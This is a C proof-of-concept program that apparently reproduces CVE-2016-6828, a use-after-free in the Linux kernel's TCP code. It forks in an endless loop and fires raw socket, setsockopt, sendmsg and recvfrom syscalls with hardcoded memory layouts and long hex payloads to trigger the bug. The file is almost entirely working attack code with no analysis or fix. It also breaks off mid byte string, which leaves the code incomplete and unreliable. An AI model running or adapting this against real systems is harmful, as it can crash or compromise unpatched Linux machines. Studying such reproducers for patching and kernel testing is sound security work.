// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html
// to build clang derp4.c -o derp4 -static
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
long r[62];
int main(int argc, char **argv)
{
while (1) {
pid_t pid = fork();
if (pid == 0) {
r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);
memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128);
r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
memcpy((void*)0x20012f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 165);
memcpy((void*)0x20020000, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28);
r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);
*(uint32_t*)0x20001fff = (uint32_t)0x2;
r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);
r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
*(uint32_t*)0x20018000 = (uint32_t)0x4;
r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);
*(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;
*(uint32_t*)0x2000dfd0 = (uint32_t)0xc;
*(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;
*(uint64_t*)0x2000dfe0 = (uint64_t)0x1;
*(uint64_t*)0x2000dfe8 = (uint64_t)0x0;
*(uint64_t*)0x2000dff0 = (uint64_t)0x0;
*(uint32_t*)0x2000dff8 = (uint32_t)0x4;
*(uint16_t*)0x2000e000 = (uint16_t)0x0;
*(uint16_t*)0x2000e002 = (uint16_t)0x0;
*(uint32_t*)0x2000e004 = (uint32_t)0xffff;
*(uint32_t*)0x2000e008 = (uint32_t)0x401;
*(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;
*(uint64_t*)0x20000008 = (uint64_t)0x37;
*(uint32_t*)0x2000ed3a = (uint32_t)0x14;
*(uint16_t*)0x2000ed3e = (uint16_t)0x2;
*(uint16_t*)0x2000ed40 = (uint16_t)0x12;
*(uint32_t*)0x2000ed42 = (uint32_t)0x1f;
*(uint32_t*)0x2000ed46 = (uint32_t)0x7;
*(uint8_t*)0x2000ed4a = (uint8_t)0x6;
*(uint8_t*)0x2000ed4b = (uint8_t)0x100;
*(uint8_t*)0x2000ed4c = (uint8_t)0x3f;
*(uint32_t*)0x2000ed4d = (uint32_t)0x11;
*(uint16_t*)0x2000ed51 = (uint16_t)0x0;
*(uint16_t*)0x2000ed53 = (uint16_t)0x808;
*(uint32_t*)0x2000ed55 = (uint32_t)0x1;
*(uint32_t*)0x2000ed59 = (uint32_t)0x0;
*(uint8_t*)0x2000ed5d = (uint8_t)0x0;
*(uint32_t*)0x2000ed5e = (uint32_t)0x12;
*(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;
*(uint16_t*)0x2000ed64 = (uint16_t)0x200;
*(uint32_t*)0x2000ed66 = (uint32_t)0x5;
*(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;
*(uint8_t*)0x2000ed6e = (uint8_t)0x9;
*(uint8_t*)0x2000ed6f = (uint8_t)0x1;
r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);
*(uint16_t*)0x20001003 = (uint16_t)0x1;
*(uint8_t*)0x20001005 = (uint8_t)0x0;
*(uint32_t*)0x20001007 = (uint32_t)0x9;
r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);
memcpy((void*)0x20015285, "\xed\xe0\xf1\x03\xbd\x1d\xe2\x8d\x13\x62\xc9\x11\xde\x3b\x55\xb1\xb2\x26\x95\xb2\x3f\x32\x96\x8a\x3d\xf7\xd4\x2c\xd9\x32\xae\x05\x9a\x60\x09\xbc\x49\x63\x6a\x45\xd5\x6f\xa8\x4b\xaf\x8a\x66\xf3\x35\xad\xe6\x68\x85\xd4\x7e\xe5\x7c\x7e\x06\xbf\x32\xfb\xf9\xd2\x9f\x40\xa3\x0a\xa0\x93\x09\x73\x39\x7d\xac\x3c\x8d\x83\xe0\x0c\x5e\xa2\x36\x9b\x9c\xb4\x62\xe8\x39\x07\xd8\x71\xc1\x2f\x6f\x18\xfa\x8a\x5d\x06\xb4\x46\xa2\x97\x79\x81\xb2\x85\xd4\x4f\x6b\x48\xc4\xf5\xdd\xa8\x8d\x10\x74\x01\xe1\x58\xb2\x82\x72\xc4\xb6\xb2\xf7\xaa\x90\x9c\x9f\x61\x95\x87\x7b\x99\xc5\xa5\x53\xbc\xab\xdb\xdb\x5e\x32\xb8\xc3\xee\xd3\xda\x7a\xf2\x5c\xc5\x1a\xf1\xd6\x1b\x53\xad\x24\xd0\xa0\xc0\x0d\x73\x9e\x81\x7e\x4e\x82\xf5\xa9\x73\x3c\x7a\x5c\x6e\x4c\x48\x7d\x42\xf5\x2f\x68\xf9\x7e\xa9\xd8\x6a\x64\x78\x08\x7a\x37\xe9\xd3\x81\x15\x34\x63\x63\x14\xb7\x1a\x43\x9b\x4f\x85\xfa\x88\x5c\xe1\x1e\xce\x87\x95\xe1\x81\xc8\x06\xaf\x1a\x64\x26\x36\x83\x36\xef\x71\x0c\x2a\xda\xe4\xff\xa1\x87\xc2\x04\x96\x1c\x72\xd9\x2d\xf0\xce\x46\xd4\x3a\xd1\xc7\x2f\x60\x25\xf8\x33\x1f\x38\x7a\x46\xb1\x43\xa4\xd2\x65\x77\x47\x85\xe9\xad\x52\xdb\x8b\x93\x23\xf1\xf9\xa9\x5f\xe4\xf8\x39\x82\xc5\xb4\xe1\x5b\x87\xa0\xfd\x2c\xc2\x84\x15\x78\xaa\x9b\x3f\xe5\x75\x6e\x05\xef\x84\x4c\x6b\x9d\x1d\x9e\x7c\x92\x3b\x55\xcb\x01\x6f\xc5\x9a\xd8\xc3\x91\x39\x95\xd7\x8f\xe9\x87\x15\x27\xe7\x19\xa8\x18\x24\xfd\x09\x11\x49\x41\xc6\xd2\xe9\x1a\xf4\xb0\x9b\x85\x9b\x3f\xb1\xf3\xc3\x48\xc5\xe7\x45\x0b\x21\x2d\x32\x27\x92\x3c\x39\x52\x0f\x2b\xdf\x52\x66\x6f\x01\x8f\xdc\xfa\x8f\x5e\x53\xb7\x82\x23\x79\xfa\x28\xe5\x24\xa7\x5e\x2a\x24\x7e\xd0\x1e\xd5\x1a\xb6\xb8\xe5\xb2\x6d\x4d\x38\x61\x79\xb8\xd1\x27\x92\x63\x0c\xed\x3c\xf1\x13\x98\x37\xfa\x98\xda\x0c\x1a\x86\xd1\x6a\x12\x86\x2f\xd0\x8d\x8e\x2e\x52\x23\xac\x2d\x82\x59\xef\x17\xbc\xf1\x47\xfb\xf0\x5f\x43\x70\x99\x14\xdf\xaf\x44\x02\xb5\xe9\x39\x51\x8e\xf2\x07\x9c\xa2\x39\xab\x07\xa2\x22\xa7\xd3\x5c\xc0\x8c\xcf\x3c\xa2\xa7\xd0\xd6\xf4\x82\xcc\x35\x75\x3a\x20\xb7\x9b\xf3\x9d\xd9\xfe\xdf\x1e\x3f\x55\xf2\x99\xdb\xd0\xb2\xd7\x86\xc1\xfa\xb3\xc7\x99\xdc\x02\xe3\x9f\xfd\x1e\x56\xc1\xf2\x51\x32\x84\x61\x30\x33\xf6\xe3\x82\x9f\xf2\x04\xaf\x5d\xf4\x3d\xa6\x0e\x25\x53\xe9\x05\x7c\x42\xbf\xfa\x97\xd7\x77\x8c\x8f\x29\x7a\xcb\x40\x13\x07\xb5\x8d\x69\xdc\x8b\x35\xd3\xb6\xf3\xd8\x07\x94\x7e\x69\x0f\xb7\x28\xf1\xb3\x45\x60\x37\x65\xa4\xf6\xbf\x9c\xb3\xf9\x3d\xe1\x08\x08\xc9\x76\x5e\x8b\x7f\x26\x01\x9d\x8f\x15\x39\x02\xfe\x8a\xe3\x3b\x8b\xf9\xae\x06\x04\xef\x0d\xcf\x67\x24\x54\xe6\x4c\xe4\x05\x8e\xd7\xda\x4c\xf2\xd7\x88\x75\x87\xf7\x7e\xd0\x49\x19\x02\x5e\x00\xc4\xeb\x3e\xec\x70\x35\x9c\x9b\xc9\xd9\x47\x65\x4c\xa3\xdb\x0e\xde\x1e\x76\x58\x27\xe0\x91\x6b\xf9\x25\x44\xa6\xa2\x85\x8f\x50\xd0\x13\x88\x57\x25\x56\x78\xed\xcb\x6b\xec\xf2\x4f\xd4\xce\xf1\x90\xcd\x49\x50\xb5\xcf\xd3\x96\x4d\x3c\xf4\x54\x8e\xa9\xdb\xd3\xb5\x9e\xe9\x87\x19\x8b\x59\xd7\xf2\xcf\x1a\xd3\x70\xca\x42\xc6\x97\x66\x38\x24\x39\x4d\x42\xa1\xf0\x24\x46\xe4\x0e\x9c\xbc\xc4\x53\xa9\xb9\x94\x4d\xca\x48\xa6\x04\xb8\x2f\x4f\xf5\x85\x32\x22\xf8\x4e\x83\xab\x34\x27\x3b\x8f\x24\x48\x15\x9b\xa9\xf8\xb9\xb7\xcb\xd5\xfb\x72\xec\x7a\xc3\x39\x9c\xde\x25\x76\x08\x3f\x49\x35\xbd\x42\x4f\x3f\x5e\xfc\x6b\x6b\x9e\x3e\x34\x47\x62\xed\x5a\xae\xdc\xcf\x4e\xe6\x18\xfa\x7f\xe6\x46\xc8\xbe\xbc\x42\x88\xb6\xfe\xbd\x96\x85\x5a\x4a\x1d\xd2\x00\xe9\x71\x48\x48\x52\xd6\xf5\x88\x7d\x94\x18\xf6\xf0\x5c\x0a\x39\x29\xc8\x78\xa0\xa8\x44\xf4\xb6\xca\x78\x75\x4a\xf7\x53\xd7\x7e\x23\xaf\x6b\xf9\xcd\x77\xb2\xd0\x37\x29\x9c\x57\xbe\x9e\x5f\x7c\xe4\x41\x59\xde\xd5\x63\x02\x2a\xc0\x74\xa6\x00\xe2\x8f\x83\x30\xc1\x60\xcd\xb3\xca\x44\x1d\x88\x54\x8b\xbc\xa8\x79\x78\x86\xa2\x49\x7c\x94\x49\xf3\xb4\x41\x44\x76\x33\xf1\x2e\x71\xbc\xa1\x39\xb9\x68\x56\xd9\xa0\xa1\x6f\xdc\x7d\xa3\xb8\x4f\x1c\xb8\x19\x26\x42\x88\x0e\xcb\xbb\xc9\x6c\xa8\xf8\xe9\x37\x86\x61\x37\x9f\xba\xb3\x9e\x54\x07\xe6\xff\x6f\x54\x8c\xcf\x7e\x3d\x14\xfd\x94\xbb\xdc\x59\x5d\x22\x86\xb5\x3b\x18\x0d\x08\xad\x15\x67\x6b\xf1\xc8\xd8\x81\xac\x14\x63\xcf\x1e\xf9\x48\xba\xe0\x33\x4c\x1e\x72\xe9\x00\x1a\x48\xc5\xb4\x2c\x71\xd6\x7a\x0b\x8f\x6c\x02\x9a\x02\xa9\x20\xbd\x8a\x56\xe1\x59\x92\x1f\x5f\xea\x61\x1b\xe3\x2f\xc0\x15\x9c\x3e\xcf\xe7\x05\xbc\x7e\xe8\x88\x58\x63\x29\xc5\x10\x26\xf0\xbc\xf5\xcd\x3d\x33\xfa\x87\x45\x25\x1d\x86\xc0\xd8\x72\xdc\x1b\xaf\xa1\xf3\x1e\x81\xb4\x7b\x4d\xb5\x79\x72\x87\x92\x1f\x9d\xa1\x8e\x1a\x24\x7f\x49\x11\xc4\x59\xa5\x8e\x6c\x7a\xdd\x17\x52\x47\x3b\x09\x28\xe4\x3b\xef\xb0\xf3\x68\x9c\xd3\x6e\xe9\x89\x38\xdb\xeb\x01\x4f\x39\x9b\x5b\x0c\x8d\x92\xcd\x5c\x15\x47\x15\xa9\x98\x70\x75\xe2\xf0\x5b\xfe\xaa\xa9\xb3\xba\xc9\x8e\x5c\x6d\xfb\x53\xb9\x8b\x4f\x7e\x31\xbe\x69\x7e\x6d\x80\x6f\x3e\xd8\x59\x1c\x13\x5a\x3b\x2b\x0e\xc6\xd1\xf9\xaa\xf1\x30\x16\xf1\x7b\x2f\x6b\x5f\xa9\xde\xfa\xfd\x59\xaa\xdd\x32\xf7\xbb\x94\x28\x93\x16\xb3\x60\xd5\x6c\x62\x93\xba\xa9\xaa\x38\x52\xdc\x2f\x37\x75\x1d\x56\xa9\x3c\x7c\x8b\x0d\x56\x9e\x05\xf7\xa1\xa6\xef\x3c\x76\x6e\x06\x06\xde\x07\x84\xa0\xeb\xeb\x8e\x46\x2f\xd9\xc2\x56\xc6\x89\x85\x8c\x39\xad\xa2\x77\x24\xe5\xb5\x00\x04\x4c\xf5\x1e\x4a\x03\x06\xbb\xa1\x1f\xe7\xf8\xb7\x3e\xdd\xfc\x18\xbf\x13\x07\x14\xdd\x8a\x6b\x0f\x44\xc0\xeb\x4a\x43\x7d\x42\xe9\x02\x63\xb5\xc2\x7a\x87\xce\x14\x0c\xaf\xd9\x2b\xaf\x4b\x22\xec\xa9\x3b\x16\xeb\xb7\xc5\x0d\x51\x91\x93\x5d\x90\xe1\x8f\x34\x86\x71\xe0\x7c\xb5\x1e\xe7\x19\xc0\xd6\xc9\x3e\x08\x75\xc0\x1f\xab\x5e\x41\xbf\x0e\x1a\x14\xcc\x40\xf6\x85\x02\xba\x3d\x78\xce\xf7\x6f\x0e\xbf\x51\xda\xc6\xa1\x59\xbd\x69\x1a\x05\x7b\x34\xbd\xa7\x28\x39\xa1\xa2\x18\xa7\x76\x8f\x51\xa5\xd2\xdc\xf4\xa7\x7b\xc8\x64\x0e\xc0\xe8\xac\xc3\xd4\xb9\x11\x78\x58\x79\xe4\x91\xc9\xcf\xe2\x0c\xbb\x11\xb3\x80\x48\xd7\xa5\xbd\x45\xdd\xb6\xad\x87\x79\x01\xa0\xe1\x89\xdb\x54\x42\x1c\x78\x47\x91\x07\xe8\xbc\x26\x15\xf2\xdb\xba\x5b\xaa\x5a\x05\x84\xa2\x83\x7d\xe5\xbb\x5a\x77\x3f\x0a\x27\x06\x4e\x86\x69\x95\x27\x22\x7e\xa2\x42\x4d\x61\xa7\xab\x6d\x05\x8b\x7b\x6b\x94\xd6\x10\x40\x66\x30\x0b\x6c\x79\xe1\x62\xee\x33\xed\xd6\xd4\x9a\x3a\xea\x95\x5b\x60\x70\x58\xc9\xc6\x6c\x47\xa7\xd1\xcc\xfa\x9f\xc7\x66\xac\xbb\x4f\xe4\x09\x74\xe3\xd1\xeb\x82\x3b\xce\x4c\x2b\xcf\x08\xcd\xf6\x96\x2b\x65\x2a\x2c\x33\xf5\x7b\x66\xdb\xec\x3d\xbf\x24\xf7\xf9\x87\x99\x26\x1b\x5a\xa0\xd0\x0e\x2f\xc0\x2e\x03\xcd\xf4\x1e\x10\x7c\xb5\xb7\xec\x75\x2c\x20\x89\xc4\xec\x61\x34\x3b\x6c\x68\x14\x95\xd9\x9a\x03\xd7\xf2\x6b\xe6\x50\x14\x80\x72\xa2\x67\xaf\xb3\x19\x12\xcc\xf9\x9d\x3d\x34\x86\x48\xe7\xa6\xe7\xc0\x9b\x6c\xeb\x2c\x0d\x26\x6f\x09\xd9\x8c\x92\x8e\xde\x80\x04\x14\xe6\x88\xbb\x39\x2f\x2c\x14\xf2\xda\x86\xdb\x10\x59\x54\x83\xe6\x5e\xe3\x14\x4b\x73\x97\x9a\x94\xa8\x09\x44\x1d\xd0\x62\x2d\x43\xb4\x5e\x38\xaa\x8e\x5b\xdd\x2f\xd3\x2c\x8e\xd3\xd0\x0f\x9d\x80\xca\x87\x4e\xab\x52\x01\x29\xb7\xe7\x55\xa2\xe4\x2d\xee\xce\x30\xe9\xcb\xc4\x3e\xf9\x58\x04\x63\x01\xec\x89\x33\x01\x26\x7d\xe2\x5d\x41\xf7\x91\xa3\xcb\x41\x62\xb4\x82\x6d\xb9\xd1\xad\xf2\x96\x0f\xad\x87\xbe\x6d\x95\xaf\xc2\x14\x12\x78\x10\x90\x86\x61\x55\x97\x77\x5c\x19\xfe\x4e\xda\xf3\x74\x08\x83\x4d\xa0\x25\x04\x05\x4b\xf3\x30\xc1\x2f\xb6\x16\x2d\x9b\x2c\x7d\x90\x5a\xd2\x28\x53\xc5\x3a\x14\x8c\x1f\xda\xd7\x36\x47\xdc\x85\x7f\x2b\xe8\x0d\xf9\x03\x92\xba\x82\x20\xde\xb3\x65\x14\xe8\xdd\xfe\x6b\x3a\xab\xd5\xad\x03\xcb\x4f\x41\x08\x97\x22\xe7\xc7\x1d\x0e\x7c\x8e\x4d\x12\x2c\x86\x8b\xb3\x31\x43\x5f\x6e\x37\xcf\x08\x83\x4d\x16\xd7\x3f\x4a\x80\x2b\x67\x1a\xbb\xaf\x8d\x1c\x1c\x5d\x00\x33\xf3\x67\x13\x43\xf1\x09\x00\x81\x68\xe1\x33\xb1\xb4\xc1\xad\xd9\x99\x0c\xac\x4f\x09\x26\xd7\xff\xc8\xcd\xfd\xe9\x32\x52\xd1\x4c\xee\x61\x89\xe0\x82\x64\xa3\x6b\xeb\x23\x87\xc8\xed\x94\xa6\x6b\x68\xec\x13\x59\xa7\x74\x06\x7d\xac\x6f\xfd\xf5\x3d\x3b\x9d\x8b\xe1\x22\x98\xf3\x0e\xbd\x3f\xfa\xbe\xb9\x86\x3d\xe4\x1f\x30\xd4\x96\x6f\x7f\xd4\x48\xbc\xc9\x8b\x1e\x8f\x63\xa1\xb4\xa9\x43\xf2\xb8\x28\x5e\x57\x93\xc5\x56\x21\x12\x20\xd5\x16\x29\x14\xb0\xff\x42\xba\x0e\x26\x6e\xcd\x7e\x7c\x72\x27\xfb\xd2\x0f\xac\xdb\x0d\xc8\xc8\xd6\xa0\xc7\x5b\xfd\x0c\xd7\x89\xe8\x8b\xee\x24\x0f\xd1\x78\x23\x82\xe7\xb5\x7f\x63\xb3\x14\x10\x78\x26\x23\xd3\x60\xbd\x53\x5a\x1b\x67\x0f\xcf\xd5\xfe\x90\x18\xa9\xd6\x80\xc3\x94\x00\x21\x6d\xdb\xab\x09\x38\x0d\x77\xdc\x3e\x90\x2f\x3c\x0e\x06\x6b\xaf\x14\x45\xcc\x0d\xcb\x1b\x74\xdc\x01\xec\x29\x23\x96\xe0\x2a\x86\xee\x92\x9c\x86\x10\x9f\x3d\x7a\x56\xf3\x6f\x3b\xef\x2b\x84\xd5\xcf\xd3\xf7\x2b\xa6\x0d\x9c\xa2\xb0\x42\x8f\xed\x53\x99\x7a\x11\x64\x5e\x53\x92\xb7\x97\x20\xaa\x25\xc2\x5d\x6b\xbd\xde\x58\xe7\x51\xc2\xd5\xa5\xe0\x9b\xbf\xe4\x81\x1c\xd5\xc4\xee\x29\xfa\xd2\xbb\xce\xbf\xfe\x40\xee\x09\xf5\x4b\xb2\x1e\x33\xef\x8f\xf9\x05\x68\x15\x7a\x45\xa0\x52\x3c\x29\xf4\x01\xf2\x64\x98\x2d\xbd\x89\xae\x86\x80\xd9\x0a\xfe\xca\x86\x46\xc3\x58\xd6\x1d\x54\xd4\x6f\x36\xe0\x32\x6a\x23\x29\xbd\x69\x22\x9b\x1e\x7f\x01\x28\xff\xc0\x1c\x8f\x01\x08\xa4\x96\xda\xfe\x96\xab\xf2\x23\x34\x34\xb0\x46\x38\xd6\x2f\x87\x62\xcf\x96\x85\xbb\xcc\x98\x27\xfc\x91\xea\xd9\x78\xc4\xcb\x42\xc0\xd3\x7d\x90\x1c\xfa\x62\xa8\xb7\xf3\x31\x04\x56\xa1\x97\xe1\xa8\xfc\xab\x90\x64\x01\x81\xae\x20\x05\x2f\x91\xaf\x27\xb9\xb5\x12\xce\x94\xa6\x6b\x32\xf2\xd0\x0b\xf5\x71\xff\xbb\xd8\xe1\x20\x5f\x0d\xbe\x90\x44\xe4\xa5\xb5\xf6\xa3\x70\x5b\xd3\x24\xa2\xb6\xba\x22\xd7\x27\x47\xff\xff\x79\x65\xf1\x82\xcf\x51\x56\xa6\x6f\x48\x32\x66\x7b\x3f\x3f\x7c\xb8\x6f\x0f\x2d\xe8\x92\x72\x86\xc4\x9e\x6f\xe7\xb6\x3f\xb6\x6f\x96\xdc\x68\x8d\x1d\x1c\xfe\x3f\x23\x45\x7d\x35\xed\x3d\x6a\x06\xe8\x4b\x7f\xb1\xe6\x2b\x66\x4a\x53\x45\xa4\x5c\x77\x96\x25\x4a\x13\x3a\xf3\xbe\x7e\x16\xb0\x51\x84\x53\xe6\x4e\x37\xd7\xc1\xee\xda\xfb\x18\xb0\x81\x3b\x16\xfc\xea\x32\x00\x75\x97\x1a\xc9\xf9\x5a\x44\x1a\x12\x08\xcb\xbe\x60\x79\x80\x60\xcd\xbd\x5b\x60\x9b\xfc\x31\x5b\xca\xa5\xda\x16\x18\x45\x95\xe1\x5b\xd4\x4c\xdc\xc9\x10\x73\x14\xbb\x0b\x9c\xdb\x0c\x0c\x8c\x3b\x42\x29\xf4\x7d\x93\x61\x5a\x6a\x6b\xac\xae\x80\x60\x5d\xd1\x3e\xe4\x6d\xf7\x3f\xb8\x7b\x7f\x35\x1b\x67\xd3\x60\x80\x0a\x08\x25\xff\xbb\x31\x47\x60\xb3\xd1\x0e\xce\xbc\xf3\x88\xe0\x56\x5e\x61\x97\x63\x82\xa4\xff\xea\xf9\x48\x7f\x4c\x62\x58\x46\x30\xe5\x2c\xbe\xa0\x18\xe4\xe8\xf6\x4f\x22\x5b\x1d\x18\xb0\x48\x0c\xe7\x25\xa9\x1a\x8e\x5a\x3f\xbd\x4c\xab\xe7\x52\x29\xa2\x35\x77\xf5\x0c\x8c\x4e\x2d\xa9\x16\x11\x00\xdf\x8b\xe1\x7f\x8f\x20\x9d\xe9\xea\x2b\x4e\xf4\xe5\x98\x4e\xf8\xe9\x5b\x98\xb9\x2a\xb8\x68\x0d\xdb\x35\xf8\xfd\x5d\x28\x14\x2a\x65\x33\x3d\xde\x77\xc5\x73\xee\xc4\xa4\x8e\x76\x12\x4f\x28\x93\x7d\xd8\xf5\xbf\x32\x39\xe1\xc1\xaa\x46\x71\x9f\xcb\xa4\x93\xa5\xae\xe0\xb1\x9f\x03\xb3\xbe\x86\xf9\x92\x45\x65\x64\x8d\xd9\x49\x09\xd2\x0c\x01\x92\x75\x1a\x29\x43\x34\x74\x21\x6d\xa6\x0e\xa7\x3b\x15\x2c\x59\xc2\xb9\x8a\x92\xcb\xc3\x8c\xc7\x06\xfd\xfc\xe1\x67\xc7\xc5\xc6\x07\x24\xc8\x06\xa7\xdc\x76\x83\x43\xec\x90\x3b\x6f\xa0\x00\x9a\x68\x44\x71\x19\xbe\xdb\x24\xb0\xcb\x9b\x8a\x28\xb6\x30\x99\x79\xd2\x42\xbe\x53\x32\x84\x0c\x17\xdc\xc9\x1c\xa9\xed\x26\x20\x69\xef\x6d\xc4\xa4\xad\xe5\x68\xec\x52\xe8\x51\x3f\xb2\x52\xbc\x6f\x84\x26\x41\xf9\x91\x22\x66\x89\xcc\x03\xa6\xa5\x7a\x07\xd7\x35\x92\x5e\xc1\xf9\x11\x1b\x4b\x6d\x50\x7b\x4f\x43\xca\x13\x37\xd2\x6d\xce\x81\xa8\x9b\x8b\x8c\x65\x75\x08\x97\x18\xb6\xd2\x2e\xd2\xe3\x31\x51\x2e\xb0\xb3\x04\x64\x71\xba\x05\x4b\x23\x91\x92\xfd\x4a\x1b\x6c\x35\xa5\x8f\xcb\xb5\xac\xd9\x40\xe5\x4b\x6b\x04\xe2\x2a\xab\xd9\x0d\xcf\x0b\x23\xfa\x1f\xcd\x4a\x46\xb0\x26\xc4\xb8\xae\x17\x82\x6c\x7f\x6f\xe6\x1a\x8c\x0d\x95\xdf\xe2\xc2\xd4\x5c\x85\x6d\x79\x3b\x8a\x6c\x51\xf3\x5f\x06\xdf\x07\x5b\x69\x8a\xde\x75\x59\x6d\x70\x99\x55\x09\x8f\xf8\xc0\x6f\x2e\xc3\x0f\x87\x1c\x79\xe8\x4b\xb0\x55\x51\xb2\xa3\x91\x9b\xb0\x89\x17\xad\x9b\x89\x81\x23\x12\xcb\x45\x8a\xd7\x2a\x0a\x19\x84\x7d\xb9\x64\xa6\x31\xa3\x48\x30\x3c\x01\x6b\x7c\x74\x20\xe6\x0b\xff\x2a\x0a\x66\x82\x00\x31\x01\xbc\xf8\x47\x02\xcc\x43\xbe\x6d\x0c\x0e\x4f\x59\x37\x4d\xcb\xc2\x37\xee\x5e\x1c\x2c\xf3\xda\xc8\xf8\xc9\x8c\xbc\xff\xd9\x8b\x8a\xee\x4e\xab\x19\x8f\xb6\xb4\xe7\x0a\xda\x9c\x5c\x00\xc3\x26\x87\x63\xb0\xa9\x1b\x31\x62\xef\x04\x10\x68\x6c\x3c\xd1\xba\x73\xc1\xaa\xf2\xe4\xbd\x29\xdb\x2c\xe3\x69\xf0\x34\x8d\xd3\x6b\x6e\x59\x42\x6f\x28\x3d\x2f\x83\x27\x48\xc0\xb7\x82\xd3\x95\x96\x0c\xdf\x22\xc7\xce\x77\xab\x09\x4c\xad\xab\x0d\x70\xee\x4d\xea\xb3\x63\x62\x04\x6f\xd7\x68\x2e\x86\x7c\xac\xd4\xc2\x6e\x09\xdf\xf0\xbe\x8c\x71\xd9\xa8\x82\xf8\xd2\x14\x70\xb7\xd0\x40\x12\x5e\xa7\xec\xab\x1a\x13\x87\x0b\x6e\x28\x59\x76\x01\xb2\x3f\x64\x62\x35\xb3\xff\x0d\x8a\x3d\x6b\x5a\xd3\x9e\x59\x14\x6d\x19\x4c\x99\x04\x75\xe4\x04\xe3\xf2\x8a\x19\x77\x06\xdd\x5f\x2e\x25\x2c\xa3\xb5\x52\xa6\xfa\x2b\x84\x35\xdc\x56\x55\x02\x63\x79\x81\x3b\x27\x82\x41\x92\x19\xb3\xe3\x63\xce\xb5\x0c\x1a\x15\x15\x38\x2a\x52\xf0\xdd\x58\x3d\xa4\x7f\x5b\xb9\xa3\x9c\x90\x14\xf9\x2c\x2b\xaa\x1e\x0d\xfd\xf6\x93\x7e\xbc\xc3\x59\x11\x6e\xd9\x52\x1e\xd0\xea\x0b\x55\x0b\x71\xfa\x69\xda\x9d\x35\x10\x70\x32\x68\xe8\xde\x47\x74\x1f\xc6\x60\x86\xbd\x15\x1c\x6b\x52\xeb\xe4\x04\x0f\x8c\x70\x2f\x8d\x6d\x7e\x5f\xfd\xe7\xd1\x87\x80\x76\xd8\x7a\x2c\xbf\xb2\x98\x12\x83\x81\x94\x11\x7d\x1c\x90\xfd\xf0\xdc\xe6\x9d\xee\x76\xde\x50\xcb\x97\x25\xca\x88\xd8\x70\x97\x40\x25\x94\xc5\xfe\x8b\x44\x05\x8d\x6e\x7f\xab\xc3\x27\xd8\x0e\x4a\x30\xb5\xfb\x95\xf8\x34\x75\x01\x1f\xe6\xac\x81\x1b\x13\x63\xb7\x60\xb8\x1c\x3b\xda\x07\x26\x9e\xfd\xeb\x7f\x43\x46\x93\x75\x63\xdc\xa7\xe9\xc1\x8f\xa9\x06\x96\xe